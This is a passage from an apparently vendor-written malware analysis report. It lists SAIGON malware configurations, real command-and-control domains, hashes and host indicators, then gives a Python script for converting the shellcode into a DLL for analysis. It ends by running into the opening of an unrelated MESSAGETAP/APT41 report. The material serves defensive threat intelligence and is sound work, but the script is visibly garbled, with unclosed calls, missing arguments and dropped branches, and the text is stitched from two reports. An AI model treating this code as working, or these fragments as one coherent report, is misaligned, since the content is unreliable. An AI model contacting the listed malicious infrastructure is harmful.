XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c
d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
Sample Version: 3.50.132
PE Timestamp: 2018-07-07T14:51:41
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com

Group / Botnet ID: 1001
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 30
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b1502ccb5c
d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e
Sample Version: 3.50.199
PE Timestamp: 2018-11-15T11:17:09
XOR Cookie: 0x40d822d9
C2 URLs:

  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com

Group / Botnet ID: 1000
Server Key: rvXxkdL5DqOzIRfh
Idle Period: 60
Load Period: 300
Host Keep Time: 1440
RSA Public Key: (0xd2185e9f2a77f781526f99baf95dff7974e15feb4b7c7a025116dec10aec8b38c808f5f0bb21ae575672b15
93518a2cf4915d0ff70c3a536de8dd5d39a633ffef644b0b4286ba12273d252bbac47e10a9d3d059, 0x10001)

Sample SHA256: 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9
Sample Version: 3.50.209
PE Timestamp: 2018-12-04T10:47:56
XOR Cookie: 0x40d822d9

  • http://softcloudstore[.]com
  • http://setworldtime[.]com
  • https://securecloudbase[.]com

Botnet ID: 1000
Server Key: 0123456789ABCDEF
Idle Period: 20
Minimum Uptime: 300
Load Period: 1800
Host Keep Time: 360
RSA Public Key: (0xdb7c3a9ea68fbaf5ba1aebc782be3a9e75b92e677a114b52840d2bbafa8ca49da40a64664d80cd62d9453
70ee8137b4beb8ecf348ef247ddbd23f9b375bb64017a5607cb3849dc9b7a17d110ea613dc51e9d2aded, 0x10001)

Appendix B: IOCs

Sample hashes:

  • 8ded07a67e779b3d67f362a9591cce225a7198d2b86ec28bbc3e4ee9249da8a5
  • c6a27a07368abc2b56ea78863f77f996ef4104692d7e8f80c016a62195a02af6
  • 431f83b1af8ab7754615adaef11f1d10201edfef4fc525811c2fcda7605b5f2e [VT]
  • 628cad1433ba2573f5d9fdc6d6ac2c7bd49a8def34e077dbbbffe31fb6b81dc9 [VT]

C2 servers:

  • https://google-download[.]com
  • https://cdn-google-eu[.]com
  • https://cdn-gmail-us[.]com
  • https://mozilla-yahoo[.]com
  • https://cdn-mozilla-sn45[.]com
  • https://cdn-digicert-i31[.]com
  • http://softcloudstore[.]com
  • http://setworldtime[.]com
  • https://securecloudbase[.]com


  • "Mozilla/5.0 (Windows NT <os_version>; rv:58.0) Gecko/20100101 Firefox/58.0"

Other host-based indicators:

  • "Power<random_string>" scheduled task
  • "PsRun" value under the HKCU\Identities\{<random_guid>} registry key

Appendix C: Shellcode Converter Script

The following Python script is intended to ease analysis of this malware. This script converts the SAIGON shellcode blob back into its original DLL form by removing the PE loader and restoring its PE header. These changes make the analysis of SAIGON shellcode blobs much simpler (e.g. allow loading of the files in IDA), however, the created DLLs will still crash when run in a debugger as the malware still relies on its (now removed) PE loader during the process injection stage of its execution. After this conversion process, the sample is relatively easy to analyze due to its small size and because it is not obfuscated.

#!/usr/bin/env python3
import argparse
import struct
from datetime import datetime

MZ_HEADER = bytes.fromhex(

def main():
    parser = argparse.ArgumentParser(description="Shellcode to PE converter for the Saigon malware family.")
    args = parser.parse_args()

    with open(args.sample, "rb") as f:
        data = bytearray(

    if data.startswith(b'MZ'):
        lfanew = struct.unpack_from('=I', data, 0x3c)[0]
        print('This is already an MZ/PE file.')
    elif not data.startswith(b'\xe9'):
        print('Unknown file type.')

    struct.pack_into('=I', data, 0, 0x00004550)
    if data[5] == 0x01:
        struct.pack_into('=H', data, 4, 0x14c)
    elif data[5] == 0x86:
        struct.pack_into('=H', data, 4, 0x8664)
        print('Unknown architecture.')

    # file alignment
    struct.pack_into('=I', data, 0x3c, 0x200)

    optional_header_size, _ = struct.unpack_from('=HH', data, 0x14)
    magic, _, _, size_of_code = struct.unpack_from('=HBBI', data, 0x18)
    print('Magic:', hex(magic))
    print('Size of code:', hex(size_of_code))

    base_of_code, base_of_data = struct.unpack_from('=II', data, 0x2c)

    if magic == 0x20b:
        # base of data, does not exist in PE32+
        if size_of_code & 0x0fff:
            tmp = (size_of_code & 0xfffff000) + 0x1000
            tmp = size_of_code
        base_of_data = base_of_code + tmp

    print('Base of code:', hex(base_of_code))
    print('Base of data:', hex(base_of_data))

    data[0x18 + optional_header_size : 0x1000] = b'\0' * (0x1000 - 0x18 - optional_header_size)

    size_of_header = struct.unpack_from('=I', data, 0x54)[0]

    data_size = 0x3000
    pos = data.find(struct.pack('=IIIII', 3, 5, 7, 11, 13))
    if pos >= 0:
        data_size = pos - base_of_data

    section = 0
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        size_of_code, base_of_code,
        base_of_data - base_of_code, size_of_header,
        0, 0,
        0, 0,
    section += 1
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        data_size, base_of_data,
        data_size, size_of_header + base_of_data - base_of_code,
        0, 0,
        0, 0,
    section += 1
    struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
        0x1000, base_of_data + data_size,
        0x1000, size_of_header + base_of_data - base_of_code + data_size,
        0, 0,
        0, 0,

    if magic == 0x20b:
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            0x1000, base_of_data + data_size + 0x1000,
            0x1000, size_of_header + base_of_data - base_of_code + data_size + 0x1000,
            0, 0,
            0, 0,
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            0x1600, base_of_data + data_size + 0x2000,
            len(data[base_of_data + data_size + 0x2000:]), size_of_header + base_of_data - base_of_code + data_size + 0x2000,
            0, 0,
            0, 0,
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            0x1000, base_of_data + data_size + 0x1000,
            0x1000, size_of_header + base_of_data - base_of_code + data_size + 0x1000,
            0, 0,
            0, 0,
        section += 1
        struct.pack_into('=8sIIIIIIHHI', data, 0x18 + optional_header_size + 0x28 * section,
            0x2000, base_of_data + data_size + 0x2000,
            len(data[base_of_data + data_size + 0x2000:]), size_of_header + base_of_data - base_of_code + data_size + 0x2000,
            0, 0,
            0, 0,

    header = MZ_HEADER + data[:size_of_header - len(MZ_HEADER)]
    pe = bytearray(header + data[0x1000:])
    with open(args.sample + '.dll', 'wb') as f:

    lfanew = struct.unpack_from('=I', pe, 0x3c)[0]
    timestamp = struct.unpack_from('=I', pe, lfanew + 8)[0]
    print('PE timestamp:', datetime.utcfromtimestamp(timestamp).isoformat())


if __name__ == "__main__":

MESSAGETAP: Who’s Reading Your Text Messages?

FireEye Mandiant recently discovered a new malware family used by APT41 (a Chinese APT group) that is designed to monitor and save SMS traffic from specific phone numbers, IMSI numbers and keywords for subsequent theft. Named MESSAGETAP, the tool was deployed by APT41 in a telecommunications network provider in support of Chinese espionage efforts. APT41’s operations have included state-sponsored cyber espionage missions as well as financially-motivated intrusions. These operations have spanned from as early as 2012 t